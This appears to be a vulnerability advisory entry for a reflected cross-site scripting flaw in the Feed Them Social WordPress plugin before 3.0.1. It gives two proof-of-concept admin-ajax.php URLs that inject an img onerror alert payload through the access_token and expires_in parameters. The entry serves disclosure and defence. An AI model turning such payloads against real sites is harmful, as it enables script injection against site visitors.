wpexploit WPEX-ID:4A3B3023-E740-411C-A77C-6477B80D7531
History: Jul 26, 2022 - 12:00 a.m.

Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting

Submitter: dc11

EPSS: 0.001 (Low), percentile: 43.6%

The plugin does not sanitise and escape the access_token and expires_in parameters of its fts_refresh_token_ajax AJAX action before outputting them back in the page, leading to Reflected Cross-Site Scripting.

Both proof-of-concept URLs below work against authenticated and unauthenticated users (the action is reachable through admin-ajax.php without a session).

https://example.com/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&access_token=<img src onerror=alert(/XSS/)>

https://example.com/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=<img src onerror=alert(/XSS/)>
